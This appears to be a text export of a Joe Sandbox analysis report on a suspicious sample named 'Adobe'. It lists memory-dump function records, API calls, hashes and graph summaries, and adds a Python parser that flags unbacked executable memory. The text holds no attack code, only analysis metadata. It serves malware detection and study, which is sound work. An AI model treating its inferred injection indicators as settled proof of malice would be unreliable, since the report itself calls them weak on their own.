                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: b5e52ed66798631799fb8f30b1112de4fefadefd1ea6c5cb0e02f879a7919541
                                                      • Instruction ID: b146d7266759a94c0abe3588b95203e092e7f3218e53924eb63f0f062f6d038f
                                                      • Opcode Fuzzy Hash: b5e52ed66798631799fb8f30b1112de4fefadefd1ea6c5cb0e02f879a7919541
                                                      • Instruction Fuzzy Hash: 9941E5B0C0072DCBDB24DFA9C885BDDBBB5BF49304F60805AD408AB255DB756949CF90

                                                       Control-flow Graph

                                                       Graph image not reproduced in this text export. Function 02D2D710-02D2D7CA: the first block calls DuplicateHandle, followed by a success/failure branch.
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D2D797
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 148e30f2fffb7f003527dfc4652e36fe9978020de8cd624b6d632788551911ed
                                                      • Instruction ID: 45383d025b137f45d18273900b5f58248d3fe41574426416108e8bd2c85568c6
                                                      • Opcode Fuzzy Hash: 148e30f2fffb7f003527dfc4652e36fe9978020de8cd624b6d632788551911ed
                                                      • Instruction Fuzzy Hash: C721C4B59002589FDB10CF9AD584ADEFBF9FB48314F14845AE918A3350D378A944CFA5

                                                       Control-flow Graph

                                                       Graph image not reproduced in this text export. Function 02D2D709-02D2D7CA: the first block calls DuplicateHandle, followed by a success/failure branch (same layout as the 02D2D710 function above).
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D2D797
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: f4e7c62041f6546973d09ae3de7b6e675793e462705c8de2967eadc26c7067a9
                                                      • Instruction ID: 881563c3450c148ad515628e303385c21d0d04ccc63e93981931428dabbeb271
                                                      • Opcode Fuzzy Hash: f4e7c62041f6546973d09ae3de7b6e675793e462705c8de2967eadc26c7067a9
                                                      • Instruction Fuzzy Hash: 8721E3B59002189FDB10CF99D584AEEBBF5FB08314F14841AE919A3310D378A944CF60

                                                       Control-flow Graph

                                                       Graph image not reproduced in this text export. Function 02D2B018-02D2B0A8: the block at 02D2B060 calls GetModuleHandleW; no other API calls.
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02D2B07E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2d20000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 711fe85a4c2ec70a8ee281ce753813eff4276adab3995bdc0e7000a34bf81042
                                                      • Instruction ID: f4d23fb3833231ace29a73a662d3d2b99b2bc40c43d875412ce6b84a7a0aac80
                                                      • Opcode Fuzzy Hash: 711fe85a4c2ec70a8ee281ce753813eff4276adab3995bdc0e7000a34bf81042
                                                      • Instruction Fuzzy Hash: DE110FB5C007498FCB20CF9AC544B9EFBF4EF89618F20841AD428A7310D379A649CFA1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170081962.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11ed000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 36b1b837610679c9a2af41a469d92b80f9e63f03a7a5a6a7e2a593eb936ae6f7
                                                      • Instruction ID: 13c8f095fd00fb3692620360fe061e5bfc35b7cc1b20d4658d03c2afc447af1c
                                                      • Opcode Fuzzy Hash: 36b1b837610679c9a2af41a469d92b80f9e63f03a7a5a6a7e2a593eb936ae6f7
                                                      • Instruction Fuzzy Hash: B121F471500640DFDF09DF98E988B26BFB5FF88318F24C569D9090A256C336D456CAA2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170145271.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1cb1da126072aeba5a72d4c126f4ee37d111f13f42077a5bf9dee079c64de23e
                                                      • Instruction ID: 35e931df96a0d5bf5e936e4db6111b84a8e60f6ec28639cb9e1751cc1a5f40f2
                                                      • Opcode Fuzzy Hash: 1cb1da126072aeba5a72d4c126f4ee37d111f13f42077a5bf9dee079c64de23e
                                                      • Instruction Fuzzy Hash: 9E21F271604204DFDF19DF68E984B26BF65FB88354F24C56DEA0A4B356C33AD407CA62
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170145271.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5953a02965f1a846d593c1bb78de14b6b122e3f798509e99d3fab3eae17b33f3
                                                      • Instruction ID: c9d22bfe0466717e3c1d8e4d7e49b115b107594aa9dc877e57a82d8575673a5c
                                                      • Opcode Fuzzy Hash: 5953a02965f1a846d593c1bb78de14b6b122e3f798509e99d3fab3eae17b33f3
                                                      • Instruction Fuzzy Hash: 94210775504204DFDF09DF98E5C0F36BB65FB84324F20C56DEA094B256C33AD406CAA2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170145271.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e0d837b520cd5f8785201adc8934826016b4510307e84ed6f07556ee2c14f1f
                                                      • Instruction ID: 40e29b9b89e5aedd89232652b5d11ccb5226473af13e9b7cd77dddbdb286d93f
                                                      • Opcode Fuzzy Hash: 7e0d837b520cd5f8785201adc8934826016b4510307e84ed6f07556ee2c14f1f
                                                      • Instruction Fuzzy Hash: 18219D755093808FDB07CF24D994B15BF71EB46214F28C5EED9498F6A7C33A980ACB62
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170081962.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11ed000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                      • Instruction ID: ff9c18d9b60e16abc3c5872baf4bfeb4a69d98fc4a23fed5485f343ded750e15
                                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                      • Instruction Fuzzy Hash: 8111DF76404280CFCF06CF54E9C4B16BFB1FB88314F24C6A9D9490B256C336D45ACBA2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170145271.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11fd000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: c19e42b2f5001c6c48e35e3286cc28408dae9853b67370779e0eba6e18757325
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 1E11BB79504280DFDB06CF54D5C4B25BFA1FB84224F24C6AED9494B296C33AD40ACBA2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170081962.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11ed000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1a62fd515e1b6ef641ec1a5f505b78b59889cad3c53f9caf581e0599fb2f204
                                                      • Instruction ID: 0f6d1119adc5fe3c977d4abec4efaf51aec2b260080d4f27ff57460f65dca0fa
                                                      • Opcode Fuzzy Hash: c1a62fd515e1b6ef641ec1a5f505b78b59889cad3c53f9caf581e0599fb2f204
                                                      • Instruction Fuzzy Hash: 2501FC31444F8099EB144BD9DD88B56FFDCDF45328F18C529ED190A246C3399440C672
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2170081962.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_11ed000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f29302701c32063519b827afca7810f30b79f6f974da45f26258491ff04ccb7
                                                      • Instruction ID: f42528c40d4ea2034a8dc128cf07d144148bad5994d1b0ca18287b27b4706bf8
                                                      • Opcode Fuzzy Hash: 7f29302701c32063519b827afca7810f30b79f6f974da45f26258491ff04ccb7
                                                      • Instruction Fuzzy Hash: 70F0F6714047849EEB148F5ADC88B62FFE8EF41734F18C45AED484B286C3799844CBB1
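
                                                       The function records above (an "APIs" list followed by a "Memory Dump Source" line and the opcode/instruction hashes) are easier to triage once grouped by the memory region they were lifted from. The following parser is an added example, not part of the Joe Sandbox report or its IDA plugin: it splits a text export into per-function records, decodes the .sdmp file name, and summarises each (process, region) with its API set, page protection and whether the region is writable, executable and not backed by a PE file on disk. The .sdmp field layout it assumes (process index, analysis stage, dump id, base address, page protection, an undecoded field, memory type, an undecoded field) is inferred from the names on this page, not taken from Joe Sandbox documentation; the PAGE_* and MEM_* values are the documented winnt.h constants. The embedded SAMPLE is a constructed, trimmed copy of a few records from this report.

```python
"""Triage helper for the per-function records of a Joe Sandbox text export.

Added example, not Joe Sandbox code: it parses the "APIs" and "Memory Dump
Source" bullets of each function record, decodes the .sdmp file name and
groups functions by (process, memory region) so that unbacked writable and
executable regions and code shared across processes stand out.
"""
import re
from collections import defaultdict

# winnt.h page-protection and memory-type constants (documented values).
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
                0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
WRITABLE_EXEC = {0x40, 0x80}

API_RE = re.compile(r"^[ \t]*•[ \t]*(\w+)\.(\w+)(?:\([^)]*\))?,?[ \t]*ref:[ \t]*([0-9A-Fa-f]+)", re.M)
SRC_RE = re.compile(r"Source File:[ \t]*(\S+\.sdmp),[ \t]*Offset:[ \t]*([0-9A-Fa-f]+),"
                    r"[ \t]*based on PE:[ \t]*(true|false)")
APIID_RE = re.compile(r"API String ID:[ \t]*(\d+-\d+)")

# Constructed sample: trimmed copies of four records from this report (processes 8 and 11).
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32 ref: 02D2D13E
• GetCurrentThread.KERNEL32 ref: 02D2D17B
• GetCurrentThreadId.KERNEL32 ref: 02D2D211
Memory Dump Source
• Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
• API String ID: 2063062207-0
• Instruction Fuzzy Hash: 9C5147B09013198FDB19DFA9D548BEEBBF1FF88308F208459E419A7360D7749948CB65
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 02D2B07E
Memory Dump Source
• Source File: 00000008.00000002.2170978120.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
• API String ID: 4139908857-0
• Instruction Fuzzy Hash: DE110FB5C007498FCB20CF9AC544B9EFBF4EF89618F20841AD428A7310D379A649CFA1
Memory Dump Source
• Source File: 00000008.00000002.2170081962.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
• API String ID:
• Instruction Fuzzy Hash: B121F471500640DFDF09DF98E988B26BFB5FF88318F24C569D9090A256C336D456CAA2
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00B9B07E
Memory Dump Source
• Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
• API String ID: 4139908857-0
• Instruction Fuzzy Hash: 348179B0A00B058FDB24DF29D05175ABBF1FF89304F10896EE48AD7A51DB75E845CB91
"""


def parse_dump_name(name):
    """Decode the eight dot-separated hex fields of an .sdmp file name.

    Field layout is inferred from the report, not from Joe Sandbox docs
    (assumption): process, stage, dump id, base address, page protection,
    <undecoded>, memory type, <undecoded>.
    """
    f = name[: -len(".sdmp")].split(".")
    if len(f) != 8:
        raise ValueError(f"unexpected .sdmp name: {name}")
    protect, mem_type = int(f[4], 16), int(f[6], 16)
    return {"process": int(f[0], 16), "stage": int(f[1], 16), "base": int(f[3], 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "writable_exec": protect in WRITABLE_EXEC,
            "mem_type": MEM_TYPE.get(mem_type, hex(mem_type))}


def split_records(text):
    """Yield one record per function; each ends at its Instruction Fuzzy Hash line."""
    buf = []
    for line in text.splitlines():
        buf.append(line)
        if "Instruction Fuzzy Hash:" in line:
            yield "\n".join(buf)
            buf = []


def parse_record(rec):
    m = SRC_RE.search(rec)
    if not m:
        return None
    info = parse_dump_name(m.group(1))
    info["offset"] = int(m.group(2), 16)
    info["pe_backed"] = m.group(3) == "true"
    info["apis"] = [api for api, _module, _ref in API_RE.findall(rec)]
    ident = APIID_RE.search(rec)
    info["api_string_id"] = ident.group(1) if ident else None
    return info


def summarize(text):
    """Group parsed records by (process, region base) for triage."""
    regions = {}
    for rec in filter(None, map(parse_record, split_records(text))):
        r = regions.setdefault((rec["process"], rec["base"]), {
            "functions": 0, "apis": set(), "protect": rec["protect"],
            "mem_type": rec["mem_type"], "pe_backed": rec["pe_backed"],
            # Writable, executable memory with no on-disk PE behind it is the
            # usual footprint of unpacked or injected code.
            "rwx_unbacked": rec["writable_exec"] and not rec["pe_backed"]})
        r["functions"] += 1
        r["apis"].update(rec["apis"])
    for r in regions.values():
        r["apis"] = sorted(r["apis"])
    return regions


def shared_api_ids(text):
    """API String IDs seen in more than one process: the same code in several targets."""
    seen = defaultdict(set)
    for rec in filter(None, map(parse_record, split_records(text))):
        if rec["api_string_id"]:
            seen[rec["api_string_id"]].add(rec["process"])
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


if __name__ == "__main__":
    for (proc, base), r in sorted(summarize(SAMPLE).items()):
        flag = "  <-- unbacked RWX" if r["rwx_unbacked"] else ""
        print(f"process {proc:2d} base {base:#010x} {r['protect']} {r['mem_type']} "
              f"functions={r['functions']} apis={','.join(r['apis']) or '-'}{flag}")
    print("shared across processes:", shared_api_ids(SAMPLE))
```

                                                       Run it against a saved copy of the report text instead of SAMPLE to get the same grouping for every function record. On this report it shows every analysed function living in PAGE_EXECUTE_READWRITE MEM_PRIVATE memory with "based on PE: false", which is what the 100% "Dynamic/Decrypted Code Coverage" figure also reflects, and it shows the same API String ID (4139908857-0, GetModuleHandleW) in both process 8 and process 11. Note that the API set itself (GetCurrentProcess/GetCurrentThread/DuplicateHandle, CreateActCtxA, GetModuleHandleW) is also routine in ordinary runtime start-up code, so it is weak evidence on its own; where the code lives and that it appears in two processes is the stronger signal.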

                                                      Execution Graph

                                                       Execution Coverage: 9.7%
                                                       Dynamic/Decrypted Code Coverage: 100%
                                                       Signature Coverage: 0%
                                                       Total number of Nodes: 42
                                                       Total number of Limit Nodes: 4
                                                       execution_graph (graph image not reproduced in this text export; the node/edge list has been dropped). API calls reached from the graph's entry points: CreateActCtxA (00B944B0 and 00B95918, reached via 00B94668, 00B94779 and 00B94888/00B94878), CallWindowProcW (04D740DA, reached from 04D74040), GetModuleHandleW (00B9B060, reached via 00B9AD30 and 00B9AE28/00B9AE18) and DuplicateHandle (00B9D710, reached from 00B9D0C0 via 00B9D699/00B9D6A8 and 00B9D2FC).

                                                       Control-flow Graph

                                                       Graph image not reproduced in this text export. Function 00B9AE28-00B9B0A8: internal calls to 00B9A14C, 00B9B0B0 or 00B9B0C0 (indirect call at 00B9AE4E), 00B9A158, 00B9A168, 00B9A178 and 00B9A188; the block at 00B9B060 calls GetModuleHandleW. Same layout as the 02D2AE28 function in process 8.
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9B07E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 7805a1b9d55c85b1b21ced077f6d7b850c8c856d6697f303b404d90a013dd531
                                                      • Instruction ID: 552136680d73a352774cbfcc789303e22435f46e6c9d2546fd28c173ade2850f
                                                      • Opcode Fuzzy Hash: 7805a1b9d55c85b1b21ced077f6d7b850c8c856d6697f303b404d90a013dd531
                                                      • Instruction Fuzzy Hash: 348179B0A00B058FDB24DF29D05175ABBF1FF89304F10896EE48AD7A51DB75E845CB91

                                                       Control-flow Graph

                                                       Graph image not reproduced in this text export. Single basic block 00B95A84-00B95B14; no API calls.
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c9844ae18b112587456208aefe43fe51604932a15432f90677d92cc0394a698e
                                                      • Instruction ID: f472f9cacec346a33a7d3fda2ba1f1f99c3579526758e37c83b8e37d9b71709b
                                                      • Opcode Fuzzy Hash: c9844ae18b112587456208aefe43fe51604932a15432f90677d92cc0394a698e
                                                      • Instruction Fuzzy Hash: 00310272844A48CFDF22CFA8C8857EDBBF1EF56314F5082AAC015AB255C735A94ACB11

Control-flow Graph

• Graph summary (rendered in the report): 13 basic blocks, b9590c-b95a61; CreateActCtxA is called from block b9598f-b959d9, and the final block b95a61 loops on itself.
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: ce35d0c8ec9cf157c025b27c85ebe18a4292d296e88b5be279cc1e2b445287d0
                                                      • Instruction ID: cc5122a53a15faf048002e9de9e59d74d82c219a18aa0ff517c20021d10b3df0
                                                      • Opcode Fuzzy Hash: ce35d0c8ec9cf157c025b27c85ebe18a4292d296e88b5be279cc1e2b445287d0
                                                      • Instruction Fuzzy Hash: 044124B0C00719CBDF25DFAAC88478DBBF6BF48314F60806AD008AB251DB756A46CF90

Control-flow Graph

• Graph summary (rendered in the report): 8 basic blocks, b944b0-b95a61; CreateActCtxA is called from the first block b944b0-b959d9, and the final block b95a61 loops on itself.
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 5c4b88729f699baae89294dde28f60cc0b4428cb889218e1cbd90f2977e94ae3
                                                      • Instruction ID: 7f20eba6c08e7f6b8c383f8a3836e5732d7fa3bd18e91047f06be7f91f98aaf2
                                                      • Opcode Fuzzy Hash: 5c4b88729f699baae89294dde28f60cc0b4428cb889218e1cbd90f2977e94ae3
                                                      • Instruction Fuzzy Hash: 0041F2B0C0061DCBDB25DFAAC884B9DBBF6FF48304F60806AD408AB255DB756946CF90

Control-flow Graph

• Graph summary (rendered in the report): 10 basic blocks, 4d74040-4d7415c; CallWindowProcW is called from block 4d740da-4d74112.
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04D74101
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2265052588.0000000004D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_4d70000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: ad537b291cd8084843a7e89d51b97f4d498e5c909ed40234f82f706a08d9ecd4
                                                      • Instruction ID: 3e2ee5a8019e0503324af644078ca66e379902a1fa2ef63b5755a45c90e48fd4
                                                      • Opcode Fuzzy Hash: ad537b291cd8084843a7e89d51b97f4d498e5c909ed40234f82f706a08d9ecd4
                                                      • Instruction Fuzzy Hash: 004129B8A00309DFDB15DF99C848AAABBF5FF89314F24C459D519AB321D375A841CFA0

Control-flow Graph

• Graph summary (rendered in the report): 3 basic blocks, b9d2fc-b9d7ca; DuplicateHandle is called from block b9d2fc-b9d7a4.
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B9D6D6,?,?,?,?,?), ref: 00B9D797
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 8cf1beeb8b487e2b48893dc5950405654146132ce9323bfa6c3b9784b2dd863b
                                                      • Instruction ID: dca0b240ae59e7443a991b855a004e37c6a110a8e83620c0951fd9240db1e32c
                                                      • Opcode Fuzzy Hash: 8cf1beeb8b487e2b48893dc5950405654146132ce9323bfa6c3b9784b2dd863b
                                                      • Instruction Fuzzy Hash: 7821E6B59002489FDB10DF9AD584AEEFBF5FB48310F14846AE918A3310D379A950CFA4

Control-flow Graph

• Graph summary (rendered in the report): 3 basic blocks, b9d709-b9d7ca; DuplicateHandle is called from block b9d709-b9d7a4.
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B9D6D6,?,?,?,?,?), ref: 00B9D797
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 1115de71b13da502202dcee55822a195aed75efdbb571e29f9af28199dd2edd2
                                                      • Instruction ID: ee5f0487fb9923da4d539db860b62193b4c23aaf87520c266caa6887b72876d4
                                                      • Opcode Fuzzy Hash: 1115de71b13da502202dcee55822a195aed75efdbb571e29f9af28199dd2edd2
                                                      • Instruction Fuzzy Hash: C221E4B5900249DFDB10CFAAD584AEEBBF5FB48310F14846AE918A3350C378A950CF61

Control-flow Graph

• Graph summary (rendered in the report): 5 basic blocks, b9b018-b9b0a8; GetModuleHandleW is called from block b9b060-b9b08b.
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9B07E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 36d1e4482115a34b0b198ed50cf28aa7ef1b72793b420f24a02de2ef76d8903f
                                                      • Instruction ID: d2da16e4901bbe1155d0fb1b89a52a821ae28d3d7ed7c9d8a6f4f6de6cd01098
                                                      • Opcode Fuzzy Hash: 36d1e4482115a34b0b198ed50cf28aa7ef1b72793b420f24a02de2ef76d8903f
                                                      • Instruction Fuzzy Hash: 39110FB6C002498FCB20DF9AD544B9EFBF4EB88710F10846AD529A7210D379A545CFA1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247557884.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_aad000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3424f12d19fc40c7d32932c5f9012dcd95a321ac8944980d7f422ff85f088816
                                                      • Instruction ID: 1d9eef0012adc1450b7abbb1268a468de0520ea04f2c8f5bdc99c7993d6fd7a2
                                                      • Opcode Fuzzy Hash: 3424f12d19fc40c7d32932c5f9012dcd95a321ac8944980d7f422ff85f088816
                                                      • Instruction Fuzzy Hash: 8021F271604204DFCB15DF24D984B26BF65FB89314F20C569D98B4B696C33AD807CA61
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247557884.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_aad000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fe1f8be56073fd5dccadc226c57e572519468f538364503cd379f7476da89b80
                                                      • Instruction ID: 63a66e861682ee5c28ddeef07efe500e4bb223f7b68e68582a6ce6e8b5868ee2
                                                      • Opcode Fuzzy Hash: fe1f8be56073fd5dccadc226c57e572519468f538364503cd379f7476da89b80
                                                      • Instruction Fuzzy Hash: 41210771504204EFDB05DF14D5C0F66BB65FB85314F20C56DD98A4B696C33AD80ACA61
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247557884.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_aad000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: 1669ae03e294c9a0102772b60490cfe9bf4ff772a1642416628f777289fa06d2
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 8511BB75504280DFCB02CF10C5C4B15BBA1FB85314F24C6A9D88A4B6A6C33AD80ACB62
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247557884.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_aad000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: 8cdc3029a8251a129a43715088ee3c32600d6828d7247cdf3a00183ee10013ae
